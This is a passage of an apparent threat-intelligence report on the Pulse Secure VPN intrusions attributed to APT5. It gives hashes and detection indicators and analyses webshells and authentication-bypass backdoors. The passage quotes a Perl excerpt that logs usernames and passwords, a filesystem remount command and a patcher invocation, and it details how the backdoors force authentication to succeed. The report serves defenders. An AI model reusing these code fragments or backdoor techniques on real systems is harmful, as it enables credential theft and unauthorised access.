targets.\u003c/p\u003e\n\u003cp\u003eAPT5 has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances. They have also consistently targeted defense and technology companies in the U.S., Europe, and Asia.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAs early as 2014, Mandiant Incident Response discovered APT5 making unauthorized code modifications to files in the embedded operating system of another technology platform.\u003c/li\u003e\n\u003cli\u003eIn 2015, APT5 compromised a U.S. telecommunications organization providing services and technologies for private and government entities. During this intrusion, the actors downloaded and modified some of the router images related to the company\u2019s network routers.\u003c/li\u003e\n\u003cli\u003eAlso during this time, APT5 stole files related to military technology from a South Asian defense organization. Observed filenames suggest the actors were interested in product specifications, emails concerning technical products, procurement bids and proposals, and documents on unmanned aerial vehicles (UAVs).\u003c/li\u003e\n\u003cli\u003eAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eRecommendations\u003c/h4\u003e\n\u003cp\u003eAll Pulse Secure Connect customers should assess the impact of the Pulse Secure mitigations and apply it if possible. Organizations should utilize the most recent version of Pulse Secure\u2019s Integrity Assurance utility \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003ereleased\u003c/a\u003e on March 31, 2021. If a device fails this Integrity Assurance utility, network administrators should follow the \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003einstructions here\u003c/a\u003e and contact their Pulse CSR for additional guidance.\u003c/p\u003e\n\u003cp\u003eOrganizations should examine available forensic evidence to determine if an attacker compromised user credentials. Ivanti highly recommends resetting all passwords in the environment and reviewing the configuration to ensure no service accounts can be used to authenticate to the vulnerability.\u003c/p\u003e\n\u003cp\u003eAdditional detections, mitigations and relevant MITRE ATT\u0026amp;CK techniques are included in the Technical Annex. Sample hashes and analysis are included to enable defenders to quickly assess if their respective appliances have been affected. Yara rules, Snort rules, and hashes are published on \u003ca href\u003d\"https://github.com/mandiant/pulsesecure_exploitation_countermeasures/\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003eMandiant\u2019s GitHub page\u003c/a\u003e.\u003c/p\u003e\n\u003ch4\u003eDetections and Mitigations\u003c/h4\u003e\n\u003cp\u003e1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eHARDPULSE contains an embedded 'recovery' URL https://ive-host/dana-na/auth/recover[.]cgi?token\u003d that may be accessed by an attacker. The sample uses the POST parameters checkcode, hashid, m, and filename. This URL is not present in legitimate versions of this file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a\u003c/p\u003e\n\u003cp\u003e68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\u003c/p\u003e\n\u003cp\u003ed72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePULSEJUMP, RADIALPULSE AND PACEMAKER use the following files to record credentials:\r\n\u003cul\u003e\n\u003cli\u003e/tmp/dsactiveuser.statementcounters\u003c/li\u003e\n\u003cli\u003e/tmp/dsstartssh.statementcounters\u003c/li\u003e\n\u003cli\u003e/tmp/dsserver-check.statementcounters\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ecd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe malicious operations of SLOWPULSE can be detected via log correlation between the authentication servers responsible for LDAP and RADIUS auth and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ea1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpon invocation of the PULSECHECK webshell, the following HTTP request headers will be sent:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u003ctable border\u003d\"1\" style\u003d\"border-collapse:collapse;width:100%\"\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003e\u003cstrong\u003eKey\u003c/strong\u003e\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003e\u003cstrong\u003eValue\u003c/strong\u003e\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003eREQUEST_METHOD\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003ePOST\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003eHTTP_X_KEY\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003e\u0026lt;BackdoorKey\u0026gt;\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003eHTTP_X_CNT\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003e\u0026lt;RC4Key\u0026gt;\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003eHTTP_X_CMD\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003e\u0026lt;RC4Command\u0026gt;\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u00a0\u003c/div\u003e\n\u003c/div\u003e\n\u003cp\u003e1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSLOWPULSE VARIANT 2 writes ACE logon credentials to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\\n.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePACEMAKER is saved at filepath /home/bin/memread\u003c/li\u003e\n\u003cli\u003eExecuted with commandline flags \u2013t, -m, -s\u003c/li\u003e\n\u003cli\u003eAttaches to victim processes with PTRACE and opens subfiles in /proc/\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eTHINBLOOD creates the files:\r\n\u003cul\u003e\n\u003cli\u003e/home/runtime/logs/log.events.vc1\u003c/li\u003e\n\u003cli\u003e/home/runtime/logs/log.events.vc2\u003c/li\u003e\n\u003cli\u003e/home/runtime/logs/log.access.vc1\u003c/li\u003e\n\u003cli\u003e/home/runtime/logs/log.access.vc2\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eExecutes the system API with the mv command specifying one of the files above, targeting:\r\n\u003cul\u003e\n\u003cli\u003e/home/runtime/logs/log.access.vc0\u003c/li\u003e\n\u003cli\u003e/home/runtime/logs/log.events.vc0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eExecutes the rm command specify one of the .vc1 files above\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSLIGHTPULSE uses /tmp/1 as command execution log\u003c/li\u003e\n\u003cli\u003eAll POST requests to meeting_testjs.cgi are suspicious\u003c/li\u003e\n\u003cli\u003ePOST parameters: cert, img, name are used by malicious logic\u003c/li\u003e\n\u003cli\u003eResponses to the endpoint with the name parameter respond with no-cache and image/gif\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eTHINBLOOD execution of sed on the files:\r\n\u003cul\u003e\n\u003cli\u003elog.events.vc0\u003c/li\u003e\n\u003cli\u003elog.access.vc0\u003c/li\u003e\n\u003cli\u003eLog.admin.vc0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSed patterns used:\r\n\u003cul\u003e\n\u003cli\u003es/.\\x00[^\\x00]*[^\\x00]*\\x09.\\x00//g\u003c/li\u003e\n\u003cli\u003es/\\x\\x00[^\\x00]*[^\\x00]*\\x09\\x\\x00//g\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sample accepts an input and output file as its first and second arguments, then writes a patched version of the input out. The commandline argument e or E must be supplied as the fourth argument. Example command line:\r\n\u003cul\u003e\n\u003cli\u003e./patcher input.bin output.bin backdoorkey e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ef2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sample uses the HTTP query parameter id and responds with HTTP headers \"Cache-Control: no-cache\\n\" and \"Content-type: text/html\\n\\n\".\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450\u003c/p\u003e\n\u003cp\u003e64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7\u003c/p\u003e\n\u003cp\u003e78d7c7c9f800f6824f63a99d935a4ad0112f97953d8c100deb29dae24d7da282\u003c/p\u003e\n\u003cp\u003e705cda7d1ace8f4adeec5502aa311620b8d6c64046a1aed2ae833e2f2835154f\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eExecute sed on PulseSecure system files\u003c/li\u003e\n\u003cli\u003eRemounts filesystem as writable: system(\"/bin/mount -o remount,rw /dev/root /\")\u003c/li\u003e\n\u003cli\u003eUnexpected execution of other system commands such as tar, cp, rm\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eMITRE ATT\u0026amp;CK Techniques\u003c/h4\u003e\n\u003cp\u003eThe following list of MITRE ATT\u0026amp;CK techniques cover all malware samples described in this report as well as those observed throughout the lifecycle of UNC2630 and UNC2717.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eT1003-OS Credential Dumping\u003c/li\u003e\n\u003cli\u003eT1016-System Network Configuration Discovery\u003c/li\u003e\n\u003cli\u003eT1021.001-Remote Desktop Protocol\u003c/li\u003e\n\u003cli\u003eT1027-Obfuscated Files or Information\u003c/li\u003e\n\u003cli\u003eT1036.005-Match Legitimate Name or Location\u003c/li\u003e\n\u003cli\u003eT1048-Exfiltration Over Alternative Protocol\u003c/li\u003e\n\u003cli\u003eT1049-System Network Connections Discovery\u003c/li\u003e\n\u003cli\u003eT1053-Scheduled Task/Job\u003c/li\u003e\n\u003cli\u003eT1057-Process Discovery\u003c/li\u003e\n\u003cli\u003eT1059-Command and Scripting Interpreter\u003c/li\u003e\n\u003cli\u003eT1059.003-Windows Command Shell\u003c/li\u003e\n\u003cli\u003eT1070-Indicator Removal on Host\u003c/li\u003e\n\u003cli\u003eT1070.001-Clear Windows Event Logs\u003c/li\u003e\n\u003cli\u003eT1070.004-File Deletion\u003c/li\u003e\n\u003cli\u003eT1071.001-Web Protocols\u003c/li\u003e\n\u003cli\u003eT1082-System Information Discovery\u003c/li\u003e\n\u003cli\u003eT1098-Account Manipulation\u003c/li\u003e\n\u003cli\u003eT1105-Ingress Tool Transfer\u003c/li\u003e\n\u003cli\u003eT1111-Two-Factor Authentication Interception\u003c/li\u003e\n\u003cli\u003eT1133-External Remote Services\u003c/li\u003e\n\u003cli\u003eT1134.001 Access Token Manipulation: Token Impersonation/Theft\u003c/li\u003e\n\u003cli\u003eT1136-Create Account\u003c/li\u003e\n\u003cli\u003eT1140-Deobfuscate/Decode Files or Information\u003c/li\u003e\n\u003cli\u003eT1190-Exploit Public-Facing Application\u003c/li\u003e\n\u003cli\u003eT1505.003-Web Shell\u003c/li\u003e\n\u003cli\u003eT1518-Software Discovery\u003c/li\u003e\n\u003cli\u003eT1554-Compromise Client Software Binary\u003c/li\u003e\n\u003cli\u003eT1556.004-Network Device Authentication\u003c/li\u003e\n\u003cli\u003eT1592.004 Gather Victim Host Information: Client Configurations\u003c/li\u003e\n\u003cli\u003eT1562 Impair Defenses\u003c/li\u003e\n\u003cli\u003eT1569.002-Service Execution\u003c/li\u003e\n\u003cli\u003eT1574 Hijack Execution Flow\u003c/li\u003e\n\u003cli\u003eT1600-Weaken Encryption\u003c/li\u003e\n\u003c/ul\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 6: MITRE ATT\u0026amp;CK Map\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png 1280w"," 1060px, 1280px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch4\u003eTechnical Annex\u003c/h4\u003e\n\u003ch5\u003eSLIGHTPULSE\u003c/h5\u003e\n\u003cp\u003eThe file meeting_testjs.cgi (SHA256: 133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a) is a webshell capable of arbitrary file read, write, and command execution. Malicious logic is inserted at the end of legitimate logic to respond to POST requests. We believe this webshell may be responsible for placing additional webshells and used to modify legitimate system components resulting in the other observed malware families due to its functionality.\u003c/p\u003e\n\u003cp\u003eThe malicious logic inserts a branch condition to respond to HTTP POST requests rather than just the typical GET requests expected of the legitimate code. If GET requests are performed the legitimate logic is still invoked. POST requests have a series of parameters checked for existence to determine which command to invoke. This logic is:\u003c/p\u003e\n\u003cp\u003e\u00a0\u003c/p\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u003ctable\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003e\u003cstrong\u003ePOST params\u003c/strong\u003e\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003e\u003cstrong\u003eInvoked Command\u003c/strong\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003ecert\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003ewritefile\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003eimg, name with nonempty value\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003ereadfile\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003eimg set to empty string \"\", name\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003eexeccmd\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003eanything else\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003einvoke original legitimate logic\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 7: Webshells respond to POSTs\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png 1254w"," 1060px, 1254px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003cp\u003eAll incoming and outgoing requests are base64 encoded/decoded and RC4 encrypted/decrypted. The scheme is simple. The first six characters of the data are a random key generated per request as a sort of nonce, with the static RC4 key appended. This nonce + phrase together act as the RC4 key. The phrase is not sent over the wire, only the nonce. This entire key is then used to encrypt/decrypt payload data that immediately follows the key. The form of data on the wire is:\u003c/p\u003e\n\u003cp\u003eOutbound/Inbound:\u003c/p\u003e\n\u003cp\u003e\u0026lt;6randbytes\u0026gt;\u003cbr\u003e^-RC4NONCE-^\u003c/p\u003e\n\u003cp\u003eUsage:\u003c/p\u003e\n\u003cp\u003e\u0026lt;6randbytes\u0026gt;\u003cbr\u003e^-------RC4 KEY--------^\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eReadFile\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis command accepts a base64 encoded, RC4 encrypted file name via the img parameter and opens it for read. The file contents are read in full then sent back to the attacker as base64 encoded, RC4 encrypted data with the headers \"Content-type: application/x-download\\n\", and form header \"Content-Disposition: attachment; filename\u003dtmp\\n\\n\".\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eWriteFile\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis command accepts a base64 encoded, RC4 encrypted filename via the cert parameter, and base64 encoded, RC4 encrypted file data via the parameter md5. The filename is opened in write mode with the file data being written to the file before the file is closed. The results of this command are sent back to the attacker, using the headers \"Cache-Control: no-cache\\n\" and \"Content-type: text/html\\n\\n\".\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eExecute\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis command accepts a base64 encoded, RC4 encrypted commands via the name parameter. The malicious logic forbids the cd command and will respond with the text Error 404 if executed. All other commands will be executed via the system API with output piped to the file /tmp/1. The full system command is \u0026gt;/tmp/1 2\u0026gt;\u0026amp;1. The output of this execution is read and sent back to the attacker base64 encoded, RC4 encrypted. The headers \u0026quot;Cache-Control: no-cache\\n\u0026quot; and \u0026quot;Content-type: image/gif\\n\\n\u0026quot; are used. The response appears to be masquerading as a GIF when sending back this command output.\u003c/p\u003e\n\u003ch5\u003eRADIALPULSE\u003c/h5\u003e\n\u003cp\u003eThe file with the SHA256 hash d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b is a modified Perl script associated with a PulseSecure web-based tool which causes usernames, passwords and information associated with logins to this application to be written to the file /tmp/dsstartssh.statementcounters.\u003c/p\u003e\n\u003cp\u003eRetrieval of these login credentials must be achieved through other means such as an interactive login or a webshell. Persistence is achieved by the addition of compromised code which is continually served when requesting this PulseSecure webpage.\u003c/p\u003e\n\u003cp\u003eAn excerpt of the code related to credential stealing is shown as follows:\u003c/p\u003e\n\u003cp\u003emy $realmName1 \u003d $signin-\u0026gt;getRealmInfo()-\u0026gt;{name};\u003c/p\u003e\n\u003cp\u003eopen(*fd, \u0026quot;\u0026gt;\u0026gt;/tmp/dsstartssh.statementcounters\u0026quot;);\u003c/p\u003e\n\u003cp\u003esyswrite(*fd, \"realm\u003d$realmName1 \", 5000);\u003c/p\u003e\n\u003cp\u003esyswrite(*fd, \"username\u003d$username \", 5000);\u003c/p\u003e\n\u003cp\u003esyswrite(*fd, \"password\u003d$password\\n\", 5000);\u003c/p\u003e\n\u003cp\u003eclose(*fd);\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 1\u003c/h5\u003e\n\u003cp\u003eThe file libdsplibs.so with SHA256 cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68 is a trojanized ELF shared object belonging to the PulseSecure VPN server. The sample has been modified to bypass specific authentication mechanisms of the LDAP and RADIUS protocols. The sample hardcodes a backdoor key that will silently subvert auth failures if the correct backdoor key is passed, establishing a VPN connection as if auth succeeded. If the backdoor password is not used, authentication will fail as normal.\u003c/p\u003e\n\u003cp\u003eIn multiple locations assembly is written into the padding regions between legitimate functions. As these regions are very small, around 20 bytes, the malicious logic stitches itself together by unconditionally jumping between multiple padding regions. The assembly is written in a way very similar to mid-function hooks, where it is common to push and then pop all flags and registers before and after the injected logic. By preserving registers and flags in this way the malicious logic is able to execute and perform its malicious logic as a passive observer if desired, only effecting the control flow in specific conditions. This is employed in two locations, the LDAP and RADIUS authentication routines,\u00a0DSAuth::LDAPAuthServer::authenticate\u00a0and\u00a0DSAuth::RadiusAuthServer::checkUsernamePassword\u00a0respectively.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eLDAP Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIn the typical execution of\u00a0DSAuth::LDAPAuthServer::authenticate\u00a0the legitimate application constructs the C++ object\u00a0DSAuth::LDAPAuthServer::ldap\u00a0then passes it to\u00a0DSLdapServer::bind\u00a0with the username and password for login. This bind may fail or succeed which determines the authentication failure or success of the LDAP protocol. The malicious logic inserted into the application redirects execution before\u00a0DSLdapServer::bind\u00a0just after the ldap object is constructed. At this point in execution the username and password are easily extracted from memory with mid-function hooking techniques, which the sample copies to a code cave in memory between two functions as a temporary storage location. The malicious logic then invokes\u00a0DSLdapServer::bind\u00a0as the normal logic would, which sets the return register EAX to 0 or 1 for failure or success. A check is then executed where the temporary password copy made earlier is checked against a hardcoded backdoor password. If this check passes the backdoor logic actives by overwriting EAX to 1 to force the application down the execution path of successful authentication, even though in reality authentication failed.\u003c/p\u003e\n\u003ch5\u003eRADIUS Two Factor Auth Bypass\u003c/h5\u003e\n\u003cp\u003eIn the typical execution of\u00a0DSAuth::RadiusAuthServer::checkUsernamePassword\u00a0the legitimate application sends a RADIUS-2FA auth packet with username and password via\u00a0RadiusAuthPacket::sendRadiusPacket. The response is then retrieved and parsed by the routine\u00a0DSAuth::RadiusAuthServer::handleResponse. After packet retrieval the packet type is verified to be 3, it's not known what this packet type specifies but this is the packet type of a successful authentication response. If the packet type check passes, then the sample reads a field of the packet that specifies if authentication was successful or not and then checks this status later. The inserted malicious logic hijacks execution just after\u00a0DSAuth::RadiusAuthServer::handleResponse\u00a0where the password sent to the RADIUS server is checked against a backdoor password. If this check passes the malicious logic overwrites the retrieved packet with values indicating that it's of type 3 and that authentication was successful. The malicious logic then rejoins the original execution flow where the packet type is checked. If written the spoofed values force the application down the execution path of successful authentication, even though in reality authentication failed.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 2\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eACE Two Factor Auth Credential Logging\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eWe also identified a variant of SLOWPULSE (SHA256:\u00a01ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd) which logs credentials used during ACE-2FA protocol authentication.\u003c/p\u003e\n\u003cp\u003eThe backdoor is implemented in the routine\u00a0DSAuth::AceAuthServer::checkUsernamePassword. As part of the login procedure the username and password are retrieved then written into a map entry structure. The backdoor inserts an unconditional jump into the logon logic that takes this map entry structure, reads the username and password fields, then writes them to the file\u00a0/home/perl/PAUS.pm\u00a0in\u00a0a+\u00a0(append) mode, using the format string\u00a0%s:%s\\n. The backdoor then unconditionally jumps back into the normal control flow to continue the logon process as normal.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 3\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eACE Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eWe Identified another variant of SLOWPULSE (SHA256:\u00a0b1c2368773259fbfef425e0bb716be958faa7e74b3282138059f511011d3afd9) which is similar to SLOWPULSE VARIANT 2 the malicious logic lives within\u00a0DSAuth::AceAuthServer::checkUsernamePassword, however this variant bypasses the logon procedure rather than login credentials. Typical execution of this routine calls\u00a0DsSecID_checkLogin\u00a0to validate the username and password which sets the EAX register to 1. The routine\u00a0DSAuth::AceAuthServer::handleACEAuthResult\u00a0then checks EAX to determine if auth was successful or not. The malicious logic hijacks execution immediately after the username and password fields are written to their map entries, then checks if the password matches the backdoor password. If the password matches, then the EAX register is overwritten to 1. This puts the program in the same state as if\u00a0DsSecID_checkLogin\u00a0had successfully executed, but unlike SLOWPULSE VARIANT 1 the original authentication routine is not called at all. The malicious logic then rejoins execution before\u00a0DSAuth::AceAuthServer::handleACEAuthResult\u00a0which will now pass. This forces the application down the execution path of successful authentication, even though in reality authentication would have failed.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 4\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eRealmSignin Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eWe identified a fourth variant of SLOWPULSE responsible for bypassing what may be the two-factor authentication step of the\u00a0DSAuth::RealmSignin\u00a0process. The backdoor is present within the function\u00a0DSAuth::RealmSignin::runSigninStep.This routine is responsible for multiple steps of the login procedure and is implemented as a large switch statement. Case 11 of the switch statement typically calls the routines\u00a0DSMap::setPrivacyKeyNames\u00a0then\u00a0DSAuth::RealmSignin::runSecondaryAuth. The malicious logic in this variant overwrites the call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This forces application flow as if DSAuth::RealmSignin::runSecondaryAuth always succeeds, without ever calling it. We were not able to recover a file with these patches applied as the attacker removed their patches after use. However, we did uncover both the patcher and unpatcher utilities. We do not provide a hash for this file as we have not recovered it from a system in the field. This analysis was performed by replaying the changes performed by the patcher we did recover.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 2 Patcher\u003c/h5\u003e\n\u003cp\u003eAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original\u00a0libdsplibs.so\u00a0file. The file with SHA256:\u00a0c9b323b9747659eac25cec078895d75f016e26a8b5858567c7fb945b7321722c\u00a0is responsible for inserting SLOWPULSE V2 malicious logic to log ACE credentials. The patcher accepts two command line arguments, the path to the original binary and the patched output file path. The original binary is read into memory, patched, and then written to the output path. The assembly patches and offsets into the original binary are hardcoded.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 3 Patcher\u003c/h5\u003e\n\u003cp\u003e\u00a0As part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original\u00a0libdsplibs.so\u00a0file. The file with SHA256:\u00a006c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7\u00a0is responsible for inserting SLOWPULSE V3 malicious logic to bypass ACE logon authentication process. The patcher accepts 